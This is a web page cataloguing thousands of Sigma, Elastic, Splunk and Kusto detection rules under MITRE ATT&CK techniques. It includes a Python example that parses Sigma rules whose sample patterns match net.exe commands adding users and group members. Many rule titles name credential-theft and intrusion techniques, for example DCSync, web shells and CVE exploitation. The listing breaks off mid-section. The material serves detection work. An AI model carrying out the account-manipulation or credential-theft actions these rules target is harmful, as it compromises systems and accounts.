Detection rules
5975 catalog-relevant detection rules from Sigma, Elastic, Splunk, and Kusto; 5974 of them are parsed into the vendor-neutral intermediate representation. Each rule page surfaces the rule's predicates, its exclusions, and the indicators that other rules share with it.
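As an added illustration of what "predicates, exclusions, and shared indicators" means in practice (this is example code written for this page, not the catalog's own parser, and the IR shape, the helper names and the two sample Sigma rules are assumptions), the block below flattens a Sigma `detection` block into field/operator/value predicates, treats selections the condition negates as exclusions, and intersects the positive predicates of two rules to find the indicators they share:

```python
"""Toy vendor-neutral IR for Sigma detection blocks (added example).

Illustrates flattening a rule into predicates and exclusions and finding
indicators two rules share. The IR shape, the helper names and the sample
rules are assumptions for this example, not the catalog's own format.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Predicate:
    field: str
    op: str                  # equals | contains | startswith | endswith | re
    value: str
    match_all: bool = False  # Sigma `|all` modifier: every listed value must match


_OPS = {"contains", "startswith", "endswith", "re"}


def _flatten(selection) -> list[Predicate]:
    """Turn one Sigma selection (a map, or a list of maps ORed together)
    into predicates; `field|modifier` keys carry the operator."""
    maps = selection if isinstance(selection, list) else [selection]
    preds = []
    for m in maps:
        for key, raw in m.items():
            field, *mods = key.split("|")
            op = next((x for x in mods if x in _OPS), "equals")
            values = raw if isinstance(raw, list) else [raw]
            for v in values:
                preds.append(Predicate(field, op, str(v), "all" in mods))
    return preds


def parse_detection(detection: dict) -> dict:
    """Return {'predicates': [...], 'exclusions': [...]}: predicates come from
    selections the condition uses positively, exclusions from selections
    named directly after `not` (wildcard forms such as `not 1 of filter_*`
    are not handled by this toy)."""
    condition = detection["condition"]
    negated = set(re.findall(r"\bnot\s+([A-Za-z_]\w*)", condition))
    predicates, exclusions = [], []
    for name, sel in detection.items():
        if name == "condition":
            continue
        (exclusions if name in negated else predicates).extend(_flatten(sel))
    return {"predicates": predicates, "exclusions": exclusions}


def shared_indicators(rule_a: dict, rule_b: dict) -> set[Predicate]:
    """Positive predicates both rules contain, i.e. indicators they share."""
    a = set(parse_detection(rule_a["detection"])["predicates"])
    b = set(parse_detection(rule_b["detection"])["predicates"])
    return a & b


# Constructed sample rules, shown as the dicts a YAML loader would produce.
RULE_A = {
    "title": "Local User Added via Net.EXE (sample)",
    "detection": {
        "selection": {
            "Image|endswith": ["\\net.exe", "\\net1.exe"],
            "CommandLine|contains|all": ["user", "/add"],
        },
        "filter_installer": {"ParentImage|endswith": "\\msiexec.exe"},
        "condition": "selection and not filter_installer",
    },
}
RULE_B = {
    "title": "Local Group Membership Added via Net.EXE (sample)",
    "detection": {
        "selection_img": {"Image|endswith": ["\\net.exe", "\\net1.exe"]},
        "selection_cli": {"CommandLine|contains|all": ["localgroup", "/add"]},
        "condition": "all of selection_*",
    },
}

if __name__ == "__main__":
    ir = parse_detection(RULE_A["detection"])
    for p in ir["predicates"]:
        print("predicate", p)
    for p in ir["exclusions"]:
        print("exclusion", p)
    for p in sorted(shared_indicators(RULE_A, RULE_B), key=str):
        print("shared   ", p)
```

Run as a script it lists the four positive predicates and one exclusion of the first sample rule, then the three indicators (two `Image|endswith` values and the `/add` argument) the two samples have in common. A real catalog would also normalise Elastic EQL/KQL, Splunk SPL and Kusto KQL into the same predicate shape before comparing; this example stops at Sigma because its YAML already separates selections from the condition.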
Reconnaissance
Gather Victim Identity Information T1589 3 rules
- Splunk Kerberos User Enumeration production
- Sigma Potential Unconstrained Delegation Discovery Via Get-ADComputer - ScriptBlock experimental
- Splunk Windows Gather Victim Identity SAM Info production
Gather Victim Identity Information: Credentials T1589.001 1 rule
- Splunk Windows Gather Victim Identity SAM Info production
Gather Victim Identity Information: Email Addresses T1589.002 2 rules
- Splunk Kerberos User Enumeration production
- Sigma Potential Unconstrained Delegation Discovery Via Get-ADComputer - ScriptBlock experimental
Gather Victim Network Information T1590 11 rules
- Sigma Failed DNS Zone Transfer test
- Splunk Local LLM Framework DNS Query production
- Kusto Network Port Sweep from External Network (ASIM Network Session schema) available
- Sigma PUA - Crassus Execution test
- Kusto Rare client observed with high reverse DNS lookup count - Anomaly based (ASIM DNS Solution) available
- Kusto Rare client observed with high reverse DNS lookup count - Static threshold based (ASIM DNS Solution) available
- Sigma Suspicious DNS Query for IP Lookup Service APIs test
- Splunk Wermgr Process Connecting To IP Check Web Services production
- Splunk Windows DNS Gather Network Info production
- Splunk Windows Gather Victim Network Info Through Ip Check Web Services production
- Splunk Windows WinPEAS PowerShell Script Execution production
Gather Victim Network Information: Domain Properties T1590.001 1 rule
- Sigma PUA - Crassus Execution test
Gather Victim Network Information: DNS T1590.002 2 rules
- Sigma Failed DNS Zone Transfer test
- Splunk Windows DNS Gather Network Info production
Gather Victim Network Information: IP Addresses T1590.005 2 rules
- Splunk Wermgr Process Connecting To IP Check Web Services production
- Splunk Windows Gather Victim Network Info Through Ip Check Web Services production
Gather Victim Host Information T1592 6 rules
- Splunk Recon AVProduct Through Pwh or WMI production
- Splunk Recon Using WMI Class production
- Splunk System Info Gathering Using Dxdiag Application production
- Splunk Windows Gather Victim Host Information Camera production
- Splunk Windows WinPEAS PowerShell Script Execution production
- Splunk WMI Recon Running Process Or Services production
Gather Victim Host Information: Hardware T1592.001 1 rule
- Splunk Windows Gather Victim Host Information Camera production
Gather Victim Host Information: Software T1592.002 1 rule
- Splunk Windows WinPEAS PowerShell Script Execution production
Gather Victim Host Information: Client Configurations T1592.004 1 rule
- Splunk Windows WinPEAS PowerShell Script Execution production
Search Open Websites/Domains T1593 1 rule
- Sigma Suspicious Git Clone test
Active Scanning T1595 6 rules
- Splunk Attacker Tools On Endpoint production
- Sigma Grixba Malware Reconnaissance Activity experimental
- Sigma PUA - PingCastle Execution test
- Sigma PUA - PingCastle Execution From Potentially Suspicious Parent test
- Splunk Windows Detect Network Scanner Behavior production
- Splunk Windows Netspy Network Scanner Execution production
Active Scanning: Scanning IP Blocks T1595.001 2 rules
- Sigma Grixba Malware Reconnaissance Activity experimental
- Splunk Windows Detect Network Scanner Behavior production
Active Scanning: Vulnerability Scanning T1595.002 1 rule
- Splunk Windows Detect Network Scanner Behavior production
Phishing for Information T1598 2 rules
- Sigma HTML File Opened From Download Folder experimental
- Splunk Windows RDP File Execution production
Phishing for Information: Spearphishing Attachment T1598.002 2 rules
- Sigma HTML File Opened From Download Folder experimental
- Splunk Windows RDP File Execution production
Resource Development
Compromise Infrastructure T1584 2 rules
- Sigma WebDAV Temporary Local File Creation test
- Sigma Windows Update Error stable
Develop Capabilities T1587 15 rules
- Sigma Conti Volume Shadow Listing test
- Sigma Creation of an Executable by an Executable test
- Sigma CVE-2021-1675 Print Spooler Exploitation Filename Pattern test
- Sigma FoggyWeb Backdoor DLL Loading test
- Sigma Formbook Process Creation test
- Sigma HackTool - PurpleSharp Execution test
- Sigma Mustang Panda Dropper test
- Sigma Potential Privilege Escalation To LOCAL SYSTEM test
- Sigma Potential PsExec Remote Execution test
- Sigma PsExec/PAExec Escalation to LOCAL SYSTEM test
- Sigma PUA - CsExec Execution test
- Sigma Suspicious Word Cab File Write CVE-2021-40444 test
- Sigma Uncommon File Created In Office Startup Folder test
- Sigma VHD Image Download Via Browser test
- Splunk Windows Certutil Root Certificate Addition production
Develop Capabilities: Malware T1587.001 10 rules
- Sigma Conti Volume Shadow Listing test
- Sigma Creation of an Executable by an Executable test
- Sigma Formbook Process Creation test
- Sigma Mustang Panda Dropper test
- Sigma Potential Privilege Escalation To LOCAL SYSTEM test
- Sigma Potential PsExec Remote Execution test
- Sigma PsExec/PAExec Escalation to LOCAL SYSTEM test
- Sigma PUA - CsExec Execution test
- Sigma Uncommon File Created In Office Startup Folder test
- Sigma VHD Image Download Via Browser test
Develop Capabilities: Digital Certificates T1587.003 1 rule
- Splunk Windows Certutil Root Certificate Addition production
Obtain Capabilities T1588 12 rules
- Sigma Hacktool Execution - Imphash test
- Sigma Hacktool Execution - PE Metadata test
- Sigma Potential Execution of Sysinternals Tools test
- Sigma PUA - Sysinternal Tool Execution - Registry test
- Sigma PUA - Sysinternals Tools Execution - Registry test
- Sigma Renamed SysInternals DebugView Execution test
- Sigma Suspicious Execution Of Renamed Sysinternals Tools - Registry test
- Sigma Suspicious Keyboard Layout Load test
- Sigma Usage of Renamed Sysinternals Tools - RegistrySet test
- Splunk Windows NirSoft AdvancedRun production
- Splunk Windows NirSoft Tool Bundle File Created production
- Splunk Windows NirSoft Utilities production
Obtain Capabilities: Tool T1588.002 12 rules
- Sigma Hacktool Execution - Imphash test
- Sigma Hacktool Execution - PE Metadata test
- Sigma Potential Execution of Sysinternals Tools test
- Sigma PUA - Sysinternal Tool Execution - Registry test
- Sigma PUA - Sysinternals Tools Execution - Registry test
- Sigma Renamed SysInternals DebugView Execution test
- Sigma Suspicious Execution Of Renamed Sysinternals Tools - Registry test
- Sigma Suspicious Keyboard Layout Load test
- Sigma Usage of Renamed Sysinternals Tools - RegistrySet test
- Splunk Windows NirSoft AdvancedRun production
- Splunk Windows NirSoft Tool Bundle File Created production
- Splunk Windows NirSoft Utilities production
Stage Capabilities T1608 6 rules
- Sigma HybridConnectionManager Service Installation - Registry test
- Sigma Suspicious Download from Office Domain test
- Splunk Windows Cobalt Strike PowerShell Loader production
- Splunk Windows Metasploit Confluence Plugin Execution production
- Splunk Windows NorthStar C2 Agent Execution production
- Splunk Windows Unusual File Creation in Confluence Directory production
Stage Capabilities: Upload Malware T1608.001 1 rule
- Splunk Windows Unusual File Creation in Confluence Directory production
Stage Capabilities: Upload Tool T1608.002 1 rule
- Splunk Windows Unusual File Creation in Confluence Directory production
Initial Access
Valid Accounts T1078 67 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Kusto Account added and removed from privileged groups
- Elastic Account Discovery Command via SYSTEM Account production
- Sigma Account renamed to admin (or likely) account to evade defense experimental
- Splunk Account set to active via Net.exe (EDR)
- Splunk Account set to active via Net.exe (Sysmon)
- Splunk Account set to active via Net.exe (Windows Event Log)
- Sigma Account Tampering - Suspicious Failed Logon Reasons test
- Sigma Admin User Remote Logon test
- Elastic AdminSDHolder Backdoor production
- Kusto AdminSDHolder Modifications
- Elastic AdminSDHolder SDProp Exclusion Added production
- Sigma Azure Windows virtual machine login via serial console experimental
- Sigma Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788) experimental
- Elastic Delegated Managed Service Account Modification by an Unusual User production
- Elastic dMSA Account Creation by an Unusual User production
- Sigma DMSA Link Attributes Modified experimental
- Sigma DMSA Service Account Created in Specific OUs - PowerShell experimental
- Kusto EatonForeseer - Unauthorized Logins available
- Kusto Email access via active sync
- Sigma External Remote RDP Logon from Public IP test
- Sigma External Remote SMB Logon from Public IP test
- Sigma Failed Logon From Public IP test
- Elastic First Time Seen Account Performing DCSync production
- Kusto Group created then added to built in domain local or global group
- Elastic Kerberos Pre-authentication Disabled for User production
- Sigma Lateral movement detection (based on "special groups" feature) experimental
- Elastic Mounting Hidden or WebDav Remote Shares production
- Splunk Multiple Host logons (Windows Event Log)
- Kusto Multiple Password Reset by user
- Sigma Network login performed to multiple targets experimental
- Sigma New DMSA Service Account Created in Specific OUs experimental
- Kusto New user created and added to the built-in administrators group
- Sigma Password Provided In Command Line Of Net.EXE test
- Elastic Potential Account Takeover - Logon from New Source IP production
- Elastic Potential Account Takeover - Mixed Logon Types production
- Elastic Potential Credential Access via DCSync production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Elastic Remote Computer Account DnsHostName Update production
- Splunk Rubeus Password Change (Windows Event Log)
- Splunk Short Lived Windows Accounts production
- Kusto Sign-ins from IPs that attempt sign-ins to disabled accounts (Uses Authentication Normalization)
- Sigma Success login attempt on a Windows OpenSSH server experimental
- Splunk Suspicious Computer Account Name Change production
- Sigma Suspicious Computer Machine Password by PowerShell test
- Splunk Suspicious Kerberos Service Ticket Request production
- Sigma Suspicious Remote Logon with Explicit Credentials test
- Splunk Suspicious Ticket Granting Ticket Request production
- Splunk Unusual Number of Computer Service Tickets Requested experimental
- Splunk Unusual Number of Remote Endpoint Authentication Events experimental
- Kusto User account added to built in domain local or global group
- Kusto User account created and deleted within 10 mins
- Kusto User account enabled and disabled within 10 mins
- Sigma User Added to Local Administrator Group stable
- Kusto User login from different countries within 3 hours (Uses Authentication Normalization)
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
- Splunk Windows ConvertTo-AADIntBackdoor Execution Via PowerShell Script production
- Splunk Windows Entra User Management Via Azure CLI production
- Splunk Windows Group Policy Object Created production
- Splunk Windows Guest Account Enabled Via Net.EXE production
- Splunk Windows Large Number of Computer Service Tickets Requested production
- Splunk Windows Multiple Account Passwords Changed production
- Splunk Windows Multiple Accounts Deleted production
- Splunk Windows Multiple Accounts Disabled production
- Splunk Windows PowerView AD Access Control List Enumeration production
- Splunk WMIC Explicit Credentials (Sysmon)
- Splunk WMIC Explicit Credentials (Windows Event Log)
Valid Accounts: Default Accounts T1078.001 6 rules
- Splunk Account set to active via Net.exe (EDR)
- Splunk Account set to active via Net.exe (Sysmon)
- Splunk Account set to active via Net.exe (Windows Event Log)
- Sigma Admin User Remote Logon test
- Sigma Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788) experimental
- Splunk Windows Guest Account Enabled Via Net.EXE production
Valid Accounts: Domain Accounts T1078.002 20 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Sigma Account renamed to admin (or likely) account to evade defense experimental
- Sigma Admin User Remote Logon test
- Elastic AdminSDHolder Backdoor production
- Elastic AdminSDHolder SDProp Exclusion Added production
- Elastic Delegated Managed Service Account Modification by an Unusual User production
- Elastic dMSA Account Creation by an Unusual User production
- Sigma DMSA Link Attributes Modified experimental
- Sigma DMSA Service Account Created in Specific OUs - PowerShell experimental
- Elastic First Time Seen Account Performing DCSync production
- Elastic Kerberos Pre-authentication Disabled for User production
- Sigma New DMSA Service Account Created in Specific OUs experimental
- Elastic Potential Credential Access via DCSync production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Elastic Remote Computer Account DnsHostName Update production
- Splunk Suspicious Computer Account Name Change production
- Splunk Suspicious Kerberos Service Ticket Request production
- Splunk Suspicious Ticket Granting Ticket Request production
- Splunk Windows Group Policy Object Created production
- Splunk Windows PowerView AD Access Control List Enumeration production
Valid Accounts: Local Accounts T1078.003 4 rules
- Elastic Account Discovery Command via SYSTEM Account production
- Sigma Admin User Remote Logon test
- Elastic Mounting Hidden or WebDav Remote Shares production
- Splunk Short Lived Windows Accounts production
Valid Accounts: Cloud Accounts T1078.004 1 rule
- Splunk Windows Entra User Management Via Azure CLI production
Replication Through Removable Media T1091 8 rules
- Elastic Execution from a Removable Media with Network Connection production
- Sigma External Disk Drive Or USB Storage Device Was Recognized By The System test
- Elastic First Time Seen Removable Device production
- Splunk Removable Media Detected (Windows Event Log)
- Splunk Windows Process Executed From Removable Media production
- Splunk Windows Replication Through Removable Media production
- Splunk Windows USBSTOR Registry Key Modification production
- Splunk Windows WPDBusEnum Registry Key Modification production
External Remote Services T1133 28 rules
- Splunk Detect Exchange Web Shell production
- Splunk Disabled Pre-Authentication Accounts Discovery - PowerShell (PowerShell)
- Splunk Disabled Pre-Authentication Accounts Discovery - PowerShell (Sysmon)
- Splunk Disabled Pre-Authentication Accounts Discovery - PowerShell (Windows Event Log)
- Sigma External Remote RDP Logon from Public IP test
- Sigma External Remote SMB Logon from Public IP test
- Sigma Failed Logon From Public IP test
- Splunk MS Exchange Mailbox Replication service writing Active Server Pages experimental
- Splunk Outbound Network Connection from Java Using Default Ports production
- Sigma Potential Exploitation of GoAnywhere MFT Vulnerability experimental
- Splunk RDP Brute-force Detection (Windows Event Log)
- Splunk RDP Connection (Sysmon)
- Splunk RDP Connection (Windows Event Log)
- Splunk RDP Hijacking (Windows Event Log)
- Splunk RDP Logon_Logoff Event (Windows Event Log)
- Sigma Remote Access Tool - ScreenConnect Installation Execution test
- Sigma Remote Access Tool - Team Viewer Session Started On Windows Host test
- Sigma Running Chrome VPN Extensions via the Registry 2 VPN Extension test
- Sigma Suspicious File Created by ArcSOC.exe experimental
- Splunk Temporary ConnectWise xml File Activity (Windows Event Log)
- Sigma Unusual Child Process of dns.exe test
- Sigma Unusual File Deletion by Dns.exe test
- Sigma Unusual File Modification by dns.exe test
- Sigma User Added to Remote Desktop Users Group test
- Splunk Web or Application Server Spawning a Shell production
- Splunk Windows MOVEit Transfer Writing ASPX production
- Splunk Windows PaperCut NG Spawn Shell production
- Splunk Windows RDPClient Connection Sequence Events production
Drive-by Compromise T1189 5 rules
- Splunk Detect hosts connecting to dynamic domain providers production
- Elastic Potential Fake CAPTCHA Phishing Attack production
- Elastic Potential Masquerading as Business App Installer production
- Kusto RecordedFuture Threat Hunting Hash All Actors
- Elastic WPS Office Exploitation via DLL Hijack production
Exploit Public-Facing Application T1190 81 rules
- Sigma Apache Spark Shell Command Injection - ProcessCreation test
- Sigma Atlassian Confluence CVE-2022-26134 test
- Kusto AV detections related to SpringShell Vulnerability available
- Sigma Commvault QLogin Argument Injection Authentication Bypass (CVE-2025-57791) experimental
- Splunk ConnectWise ScreenConnect Path Traversal production
- Splunk ConnectWise ScreenConnect Path Traversal Windows SACL production
- Sigma CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux) test
- Sigma CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) test
- Sigma CVE-2024-50623 Exploitation Attempt - Cleo experimental
- Splunk Detect Exchange Web Shell production
- Sigma DNS RCE CVE-2020-1350 test
- Kusto Exchange OAB Virtual Directory Attribute Containing Potential Webshell available
- Sigma Exploitation Activity of CVE-2025-59287 - WSUS Suspicious Child Process experimental
- Sigma Exploited CVE-2020-10189 Zoho ManageEngine test
- Sigma Failed Logon From Public IP test
- Kusto Identify SysAid Server web shell creation
- Sigma Linux Suspicious Child Process from Node.js - React2Shell experimental
- Sigma LPE InstallerFileTakeOver PoC CVE-2021-41379 test
- Kusto Microsoft Defender for Endpoint (MDE) signatures for Azure Synapse pipelines and Azure Data Factory
- Elastic Microsoft Exchange Server UM Spawning Suspicious Processes production
- Elastic Microsoft Exchange Server UM Writing Suspicious Files production
- Elastic Microsoft Exchange Worker Spawning Suspicious Processes production
- Splunk Microsoft SQL Server Suspicious Child Process - Windows (Sysmon)
- Splunk Microsoft SQL Server Suspicious Child Process - Windows (Windows Event Log)
- Splunk MS Exchange Mailbox Replication service writing Active Server Pages experimental
- Splunk Outbound Network Connection from Java Using Default Ports production
- Sigma Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt test
- Sigma Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon test
- Sigma Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution test
- Sigma Potential CVE-2022-26809 Exploitation Attempt test
- Sigma Potential Exploitation Attempt Of Undocumented WindowsServer RCE test
- Sigma Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309) experimental
- Sigma Potential Exploitation of GoAnywhere MFT Vulnerability experimental
- Splunk Potential Exposed SMB_RDP Port - Windows (Windows Event Log)
- Sigma Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity test
- Sigma Potential SAP NetWeaver Webshell Creation experimental
- Sigma Potential SAP NetWeaver Webshell Creation - Linux experimental
- Sigma Potential SharePoint ToolShell CVE-2025-53770 Exploitation - File Create experimental
- Sigma Potential SharePoint ToolShell CVE-2025-53770 Exploitation Indicators experimental
- Splunk Potential SMB Activity from External IP - Windows (Windows Event Log)
- Sigma Remote Access Tool - ScreenConnect Server Web Shell Execution test
- Elastic ScreenConnect Server Spawning Suspicious Processes production
- Kusto Silk Typhoon New UM Service Child Process
- Sigma Suspicious Child Process of SAP NetWeaver experimental
- Sigma Suspicious Child Process of SAP NetWeaver - Linux experimental
- Sigma Suspicious Child Process of SolarWinds WebHelpDesk experimental
- Sigma Suspicious Child Process Of SQL Server test
- Splunk Suspicious Confluence Child Process - Windows (Sysmon)
- Splunk Suspicious Confluence Child Process - Windows (Windows Event Log)
- Sigma Suspicious CrushFTP Child Process experimental
- Sigma Suspicious File Drop by Exchange test
- Sigma Suspicious File Write to SharePoint Layouts Directory experimental
- Sigma Suspicious File Write to Webapps Root Directory experimental
- Elastic Suspicious JetBrains TeamCity Child Process production
- Sigma Suspicious MSExchangeMailboxReplication ASPX Write test
- Sigma Suspicious Process By Web Server Process test
- Sigma Suspicious Processes Spawned by WinRM test
- Elastic Suspicious SolarWinds Web Help Desk Java Module Load or Child Process production
- Sigma Terminal Service Process Spawn test
- Elastic Unusual Child Process of dns.exe production
- Elastic Unusual File Operation by dns.exe production
- Elastic Unusual Process For MSSQL Service Accounts production
- Splunk Web or Application Server Spawning a Shell production
- Splunk WebLogic CVE-2017-10271 (PowerShell)
- Splunk WebLogic CVE-2017-10271 (Sysmon)
- Splunk WebLogic CVE-2017-10271 (Windows Event Log)
- Splunk Windows Identify PowerShell Web Access IIS Pool production
- Splunk Windows Metasploit Confluence Plugin Execution production
- Splunk Windows MOVEit Transfer Writing ASPX production
- Splunk Windows PaperCut NG Spawn Shell production
- Elastic Windows Server Update Service Spawning Suspicious Processes production
- Splunk Windows SharePoint Spinstall0 Webshell File Creation production
- Splunk Windows Shell or Script Execution From IIS Directory production
- Splunk Windows Shell Process from CrushFTP production
- Sigma Windows Suspicious Child Process from Node.js - React2Shell experimental
- Splunk Windows Suspicious React or Next.js Child Process production
- Splunk Windows TeamCity Payload Execution from Temp Directory production
- Splunk Windows TeamCity Plugin Installed production
- Splunk Windows Unusual File Creation in Confluence Directory production
- Splunk Windows WSUS Spawning Shell production
- Splunk WinRM Spawning a Process experimental
Supply Chain Compromise T1195 34 rules
- Splunk 3CX Supply Chain Attack Network Indicators production
- Splunk 3CXDesktopApp.exe Execution (EDR)
- Splunk 3CXDesktopApp.exe Execution (Sysmon)
- Splunk 3CXDesktopApp.exe Execution (Windows Event Log)
- Sigma Axios NPM Compromise File Creation Indicators - Linux experimental
- Sigma Axios NPM Compromise File Creation Indicators - MacOS experimental
- Sigma Axios NPM Compromise File Creation Indicators - Windows experimental
- Sigma Axios NPM Compromise Indicators - Linux experimental
- Sigma Axios NPM Compromise Indicators - macOS experimental
- Sigma Axios NPM Compromise Indicators - Windows experimental
- Elastic Command Execution via SolarWinds Process production
- Elastic Deprecated - SUNBURST Command and Control Activity production
- Splunk GitHub Workflow File Creation or Modification production
- Splunk Hunting 3CXDesktopApp Software production
- Sigma LiteLLM / TeamPCP Supply Chain Attack Indicators experimental
- Sigma Notepad++ Updater DNS Query to Uncommon Domains experimental
- Sigma Octopus Scanner Malware test
- Splunk Shai-Hulud 2 Exfiltration Artifact Files production
- Sigma Shai-Hulud 2.0 Malicious NPM Package Installation experimental
- Sigma Shai-Hulud 2.0 Malicious NPM Package Installation - Linux experimental
- Sigma Shai-Hulud Malicious Bun Execution experimental
- Sigma Shai-Hulud Malicious Bun Execution - Linux experimental
- Splunk Shai-Hulud Workflow File Creation or Modification production
- Elastic SolarWinds Process Disabling Services via Registry production
- Kusto Solorigate Defender Detections
- Kusto SUNBURST and SUPERNOVA backdoor hashes available
- Kusto SUNBURST and SUPERNOVA backdoor hashes (Normalized File Events)
- Kusto SUNBURST network beacons available
- Sigma Suspicious Child Process of Notepad++ Updater - GUP.Exe experimental
- Elastic Suspicious Execution from VS Code Extension production
- Elastic Suspicious SolarWinds Child Process production
- Sigma TeamPCP LiteLLM Supply Chain Attack Persistence Indicators experimental
- Sigma Uncommon File Created by Notepad++ Updater Gup.EXE experimental
- Splunk Windows Vulnerable 3CX Software production
Supply Chain Compromise: Compromise Software Dependencies and Development Tools T1195.001 1 rule
- Sigma Octopus Scanner Malware test
Supply Chain Compromise: Compromise Software Supply Chain T1195.002 24 rules
- Splunk 3CX Supply Chain Attack Network Indicators production
- Sigma Axios NPM Compromise File Creation Indicators - Linux experimental
- Sigma Axios NPM Compromise File Creation Indicators - MacOS experimental
- Sigma Axios NPM Compromise File Creation Indicators - Windows experimental
- Sigma Axios NPM Compromise Indicators - Linux experimental
- Sigma Axios NPM Compromise Indicators - macOS experimental
- Sigma Axios NPM Compromise Indicators - Windows experimental
- Elastic Command Execution via SolarWinds Process production
- Elastic Deprecated - SUNBURST Command and Control Activity production
- Splunk Hunting 3CXDesktopApp Software production
- Sigma LiteLLM / TeamPCP Supply Chain Attack Indicators experimental
- Sigma Notepad++ Updater DNS Query to Uncommon Domains experimental
- Splunk Shai-Hulud 2 Exfiltration Artifact Files production
- Sigma Shai-Hulud 2.0 Malicious NPM Package Installation experimental
- Sigma Shai-Hulud 2.0 Malicious NPM Package Installation - Linux experimental
- Sigma Shai-Hulud Malicious Bun Execution experimental
- Sigma Shai-Hulud Malicious Bun Execution - Linux experimental
- Elastic SolarWinds Process Disabling Services via Registry production
- Sigma Suspicious Child Process of Notepad++ Updater - GUP.Exe experimental
- Elastic Suspicious Execution from VS Code Extension production
- Elastic Suspicious SolarWinds Child Process production
- Sigma TeamPCP LiteLLM Supply Chain Attack Persistence Indicators experimental
- Sigma Uncommon File Created by Notepad++ Updater Gup.EXE experimental
- Splunk Windows Vulnerable 3CX Software production
Hardware Additions T1200 6 rules
- Sigma Device Installation Blocked test
- Sigma External Disk Drive Or USB Storage Device Was Recognized By The System test
- Sigma USB Device Plugged test
- Splunk Windows Process Executed From Removable Media production
- Splunk Windows USBSTOR Registry Key Modification production
- Splunk Windows WPDBusEnum Registry Key Modification production
Phishing T1566 83 rules
- Sigma Arbitrary Shell Command Execution Via Settingcontent-Ms test
- Elastic Creation of SettingContent-ms Files production
- Sigma CVE-2021-31979 CVE-2021-33771 Exploits test
- Sigma CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum test
- Splunk Detect Outlook exe writing a zip file production
- Elastic Downloaded Shortcut Files production
- Elastic Downloaded URL Files production
- Sigma Droppers Exploiting CVE-2017-11882 stable
- Elastic Execution of File Written or Modified by Microsoft Office production
- Sigma Exploit for CVE-2017-0261 test
- Sigma Exploit for CVE-2017-8759 test
- Elastic File with Suspicious Extension Downloaded production
- Sigma HTML File Opened From Download Folder experimental
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Sigma ISO File Created Within Temp Folders test
- Sigma ISO Image Mounted test
- Sigma ISO or Image Mount Indicator in Recent Files test
- Splunk Malicious Document Execution (Sysmon)
- Splunk Malicious Document Execution (Windows Event Log)
- Kusto Office ASR rule triggered from browser spawned office process. available
- Sigma Office Macro File Creation test
- Sigma Office Macro File Creation From Suspicious Process test
- Sigma Office Macro File Download test
- Sigma Password Protected ZIP File Opened (Email Attachment) test
- Sigma Phishing Pattern ISO in Archive test
- Elastic Potential CVE-2025-33053 Exploitation production
- Elastic Potential Execution via FileFix Phishing Attack production
- Elastic Potential Fake CAPTCHA Phishing Attack production
- Elastic Potential Foxmail Exploitation production
- Sigma Potential Initial Access via DLL Search Order Hijacking test
- Elastic Potential Process Injection from Malicious Document production
- Elastic Potential Remote File Execution via MSIEXEC production
- Splunk Process Creating LNK file in Suspicious Location production
- Splunk RDP File Executed from Outlook Temp Directory (Sysmon)
- Splunk RDP File Executed from Outlook Temp Directory (Windows Event Log)
- Splunk RDP File Written by Outlook (Sysmon)
- Splunk RDP File Written by Outlook (Windows Event Log)
- Kusto RecordedFuture Threat Hunting Domain All Actors
- Elastic Remote Desktop File Opened from Suspicious Path production
- Elastic Remote XSL Script Execution via COM production
- Sigma Suspicious Double Extension File Execution stable
- Elastic Suspicious Execution from INET Cache production
- Sigma Suspicious Execution From Outlook Temporary Folder test
- Elastic Suspicious Execution via Microsoft Office Add-Ins production
- Elastic Suspicious Explorer Child Process production
- Sigma Suspicious File Created in Outlook Temporary Directory experimental
- Sigma Suspicious HH.EXE Execution test
- Elastic Suspicious HTML File Creation production
- Sigma Suspicious HWP Sub Processes test
- Sigma Suspicious Microsoft OneNote Child Process test
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Kusto Suspicious MSC File Launched
- Kusto Suspicious parentprocess relationship - Office child processes. available
- Elastic Suspicious PDF Reader Child Process production
- Kusto T1566.002 Spearphishing Link - Rare URL Clicks
- Elastic Unusual Execution via Microsoft Common Console File production
- Sigma WebDAV Temporary Local File Creation test
- Splunk Windows CAB File on Disk production
- Splunk Windows Defender ASR Audit Events production
- Splunk Windows Defender ASR Block Events production
- Splunk Windows Defender ASR Rules Stacking production
- Splunk Windows InProcServer32 New Outlook Form production
- Splunk Windows ISO LNK File Creation production
- Splunk Windows Office Product Dropped Cab or Inf File production
- Splunk Windows Office Product Dropped Uncommon File production
- Splunk Windows Office Product Loaded MSHTML Module production
- Splunk Windows Office Product Loading Taskschd DLL production
- Splunk Windows Office Product Loading VBE7 DLL production
- Splunk Windows Office Product Spawned Child Process For Download production
- Splunk Windows Office Product Spawned Control production
- Splunk Windows Office Product Spawned MSDT production
- Splunk Windows Office Product Spawned Rundll32 With No DLL production
- Splunk Windows Office Product Spawned Uncommon Process production
- Splunk Windows Phishing Outlook Drop Dll In FORM Dir production
- Splunk Windows Phishing PDF File Executes URL Link production
- Splunk Windows Phishing Recent ISO Exec Registry production
- Sigma Windows Registry Trust Record Modification test
- Elastic Windows Script Executing PowerShell production
- Elastic Windows Script Interpreter Executing Process via WMI production
- Splunk Windows Spearphishing Attachment Connect To None MS Office Domain production
- Splunk Windows Spearphishing Attachment Onenote Spawn Mshta production
- Splunk Windows Universal Data Link File Creation production
Phishing: Spearphishing Attachment T1566.001 69 rules
- Sigma Arbitrary Shell Command Execution Via Settingcontent-Ms test
- Elastic Creation of SettingContent-ms Files production
- Splunk Detect Outlook exe writing a zip file production
- Elastic Downloaded Shortcut Files production
- Elastic Downloaded URL Files production
- Sigma Droppers Exploiting CVE-2017-11882 stable
- Elastic Execution of File Written or Modified by Microsoft Office production
